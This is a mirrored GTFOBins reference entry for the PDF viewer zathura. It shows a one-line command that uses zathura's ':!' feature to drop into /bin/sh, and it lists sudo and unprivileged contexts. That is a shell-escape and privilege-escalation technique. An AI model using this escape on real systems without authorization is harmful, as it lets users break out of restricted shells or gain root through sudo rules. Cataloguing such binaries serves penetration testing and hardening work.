1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 06:31:33 +01:00
GTFOBins.github.io/_gtfobins/zathura
2026-01-08 21:44:09 +01:00

15 lines
296 B
Plaintext

---
comment: |-
This requires a running X server.
functions:
shell:
- code: |-
zathura
:! /bin/sh -c 'exec /bin/sh 0<&1'
comment: |-
The interaction happens in a GUI window, while the shell is dropped in the terminal.
contexts:
sudo:
unprivileged:
...